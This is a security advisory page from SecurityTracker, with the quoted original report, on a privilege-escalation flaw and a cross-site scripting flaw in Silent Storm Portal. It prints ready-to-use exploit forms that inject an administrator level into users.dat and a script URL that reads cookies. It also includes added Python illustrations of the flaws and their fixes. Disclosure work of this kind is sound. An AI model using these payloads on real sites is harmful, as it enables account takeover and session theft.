SecurityTracker.com
SecurityTracker Archives

Category:   Application (Forum/Board/Portal)  >   Silent Storm Portal
Vendors:   silent-storm.co.uk
Silent Storm Portal Input Validation Errors Let Remote Users Gain Administrative Privileges and Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1011470
SecurityTracker URL:  http://securitytracker.com/id/1011470
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Sep 30 2004
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of authentication information, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 2.1, 2.2
Description:   Two vulnerabilities were reported in Silent Storm Portal. A remote user can obtain administrative privileges on the target application. A remote user can also conduct cross-site scripting attacks.

CHT Security Research reported that 'profile.php' does not properly validate the e-mail address a user supplies when updating their profile. Account records are kept in the plaintext file 'users.dat' (in the 'db' directory) as fields separated by the string '<~>', with the fourth field holding the access level (1 = Administrator, 2 = Normal User). A remote authenticated user can submit an e-mail address that contains the delimiter followed by a level value of '1'. The value is written into the file unfiltered, so on the next read the injected '1' is parsed as the account's level and the user becomes an administrator. The same injection through the registration form creates a new account with administrative privileges directly.

A demonstration exploit form is provided:

<form method="post" action="http://www.victim.com/index.php?module=../../profile">
<input type="text" name="mail" value="any@mail.com"><br>
<input type="hidden" name="mail" value="<~>1<~>">
<input type="submit" name="post" value="Get Admin!">
</form>
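The following is an added illustration of the delimiter injection described above; it is not code from the advisory or from Silent Storm Portal. It models users.dat as '<~>'-separated records in the layout the advisory's sample shows (username, password, e-mail, level, then empty fields; 1 = Administrator, 2 = Normal User). The nine-field record width, the function names and the in-memory file handling are assumptions. It writes the e-mail field the way the flawed update does, re-reads the record to show the shifted level column, and then shows a hardened update that rejects any field containing the delimiter or a line break and checks the record width before writing:

```python
"""Delimiter injection into a '<~>'-separated flat-file user database.

Added illustration, not Silent Storm Portal code. The record layout
(username, password, e-mail, level, then empty fields) and the level
values 1 = Administrator / 2 = Normal User follow the advisory; the
nine-field width, the function names and the in-memory file handling
are assumptions.
"""

DELIM = "<~>"
LEVEL_ADMIN = "1"
LEVEL_USER = "2"
NUM_FIELDS = 9            # assumed: the advisory's sample record has nine fields

# Constructed sample users.dat content, in the shape the advisory shows
SAMPLE_DB = "evilaccount<~>password<~>any@mail.com<~>2<~><~><~><~><~>\n"


def parse_db(text):
    """Split users.dat into records; each record is a list of fields."""
    return [line.split(DELIM) for line in text.splitlines() if line]


def serialize_db(records):
    """Join records back into the file format."""
    return "".join(DELIM.join(rec) + "\n" for rec in records)


def level_of(text, username):
    """Return the level field (fourth column) of the named user after re-parsing."""
    for rec in parse_db(text):
        if rec[0] == username:
            return rec[3]
    return None


def update_mail_vulnerable(text, username, new_mail):
    """Mimics the flaw: the submitted e-mail is written straight into the
    record, so a value such as 'any@mail.com<~>1<~>' adds extra columns and
    the attacker-supplied '1' is read back as the account level."""
    records = parse_db(text)
    for rec in records:
        if rec[0] == username:
            rec[2] = new_mail
    return serialize_db(records)


class InvalidField(ValueError):
    """Raised when a field would break the record layout."""


def validate_mail(value):
    """Reject anything that could escape its field or its line."""
    if DELIM in value or "\n" in value or "\r" in value:
        raise InvalidField("field delimiter or line break in e-mail address")
    local, sep, domain = value.partition("@")
    if not sep or not local or "." not in domain:
        raise InvalidField("not an e-mail address")
    return value


def update_mail_fixed(text, username, new_mail):
    """Hardened update: validate the field before writing and refuse to
    serialize any record that does not have exactly NUM_FIELDS columns."""
    new_mail = validate_mail(new_mail)
    records = parse_db(text)
    for rec in records:
        if len(rec) != NUM_FIELDS:
            raise InvalidField("corrupt record width for %r" % rec[0])
        if rec[0] == username:
            rec[2] = new_mail
    return serialize_db(records)


def demo():
    """Run the injection against the sample record; returns (level before, level after)."""
    payload = "any@mail.com<~>1<~>"          # the 'ema' value from exploit2.html
    after = update_mail_vulnerable(SAMPLE_DB, "evilaccount", payload)
    print(after.rstrip())                     # level column now reads 1
    try:
        update_mail_fixed(SAMPLE_DB, "evilaccount", payload)
    except InvalidField as exc:
        print("hardened update rejected it:", exc)
    return level_of(SAMPLE_DB, "evilaccount"), level_of(after, "evilaccount")


if __name__ == "__main__":
    demo()
```

Rejecting the delimiter is the essential check; the width check catches records that were already corrupted by an earlier injection so that they are not silently re-serialized. Checking the user's level on read does nothing here, because the injected value is a perfectly well-formed '1' by the time it is read back.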

It is also reported that the software does not filter HTML code from user-supplied input in the 'module' parameter. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Silent Storm Portal software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

http://[target]/index.php?module=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
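The following is an added illustration of the reflected cross-site scripting issue; it is not code from the advisory or from Silent Storm Portal. It decodes the 'module' value from the demonstration URL the way the application would receive it, then shows an unescaped echo of that value beside one escaped with html.escape(). Where Silent Storm Portal actually echoes the parameter is not stated on this page; the 'module not found' template and the function names are assumptions:

```python
"""Reflected cross-site scripting through the 'module' query parameter.

Added illustration, not Silent Storm Portal code. It assumes the portal
echoes the requested module name back into the page; the 'module not
found' template and the function names are invented.
"""
import html
from urllib.parse import urlsplit, unquote

# Demonstration URL from the advisory
DEMO_URL = ("http://www.victim.com/index.php?module=%3Cscript%20language="
            "javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E")


def module_param(url):
    """Return the decoded 'module' value as PHP's $_GET['module'] would hold it.
    Splitting on '&' only and decoding afterwards keeps the ';' inside the
    payload from being treated as a parameter separator."""
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if unquote(key) == "module":
            return unquote(value)
    return ""


def render_vulnerable(module):
    """Echoes the parameter unescaped, so the browser parses it as markup."""
    return "<p>Module '%s' not found</p>" % module


def render_fixed(module):
    """Escapes for an HTML text context before interpolating. This is the
    right encoding for element content or a quoted attribute only; a value
    placed inside a script block or a URL needs its own encoding."""
    return "<p>Module '%s' not found</p>" % html.escape(module, quote=True)


def contains_script_tag(page):
    """Crude check used only to contrast the two renderings."""
    return "<script" in page.lower()


if __name__ == "__main__":
    m = module_param(DEMO_URL)
    print(render_vulnerable(m))
    print(render_fixed(m))
```

The vendor's own URLs pass values such as '../../Home' in the same parameter, so output escaping rather than a strict name filter is the change that addresses the reflected-script issue without altering how the application is addressed.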

The original advisory is available at:

http://www.cyberspy.org/gam/silentstorm.multiple

Impact:   A remote user can obtain administrative privileges on the target application.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Silent Storm Portal software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.silent-storm.co.uk/ssp/index.php?module=../../Home
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Multiple Vulnerabilities in Silent Storm Portal




#####################################
# CHT Security Research-2004        #
# http://www.CyberSpy.Org           #
# Turkey                            #
#####################################

Software:
Silent Storm Portal

Web Site:
http://www.silent-storm.co.uk/ssp/

Affected Version(s):
2.1,2.2

Description:
Silent Storm Portal is a PHP-based portal system. It requires PHP4 or above; no MySQL is needed.

Multiple Vulnerabilities in Silent Storm Portal:

Cross-Site Scripting vulnerability : 

Silent Storm Portal is prone to cross-site scripting attacks. It is possible to construct a link containing arbitrary script code
to a website running Silent Storm Portal. When a user browses the link, the script code will be executed on the user in the context
of the site using the Portal. The impact of this issue is that the attacker is able to hijack a legitimate web user's session by
stealing cookie-based authentication credentials.

Demonstration:

http://www.victim.com/index.php?module=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E


Unauthorized Administrative Access Vulnerability :

Silent Storm Portal stores all account information, usernames and passwords in the users.dat file. This file is a plaintext file stored
in the db directory. There is a flaw in the profile.php file which could allow normal members to gain escalated privileges. The issue occurs
due to insufficient sanitization of user-supplied data, which may allow escape character sequences to be injected into the users.dat
file. Submitting an e-mail address with an evil level code via the profile module will inject the Administrator level value into the database
file and will escalate the current level to Administrator privileges.

Demonstration:

Register a user account then login and run the exploit.html

---exploit.html----
<form method="post" action="http://www.victim.com/index.php?module=../../profile">
<input type="text" name="mail" value="any@mail.com"><br>
<input type="hidden" name="mail" value="<~>1<~>">
<input type="submit" name="post" value="Get Admin!">
</form>
---/exploit.html---

That's All!
What Happened?
The third line of exploit.html injected the Administrator level "1" into the database file.
( 1: Administrator, 2: Normal User. )

Examples from the database file:

before exploiting:

evilaccount<~>password<~>any@mail.com<~>2<~><~><~><~><~>
                                        ^ Level: Normal User

after exploiting:

evilaccount<~>password<~>any@mail.com<~>1<~><~>2<~><~><~><~><~><~><~>
                                        ^ Injected Level: Administrator

You'll get the "Updated Your Profile Sucessfuly !" message after executing exploit.html.
That's All! Log out and re-login with your username/password.
Click the "Admin Panel" link. ( index.php?module=../../apanel )
Now you have full Administrator privileges.

Here is another piece of code that creates an Administrator account directly on the victim's portal:

---exploit2.html----
<form method="post" action="http://www.victim.com/index.php?module=../../Home">
User:<input type="text" name="usr" size="10"><br>
Pass:<input type="password" name="pas" size="10"><br>
<input type="hidden" name="ema" value="any@mail.com<~>1<~>"><br>
<input type="submit" name="reg" value="Create Admin!">
</form>
---/exploit2.html---

----------------------------
The original article can be found at: 
http://www.CyberSpy.Org
(Turkish Language)

 
 


Copyright 2020, SecurityGlobal.net LLC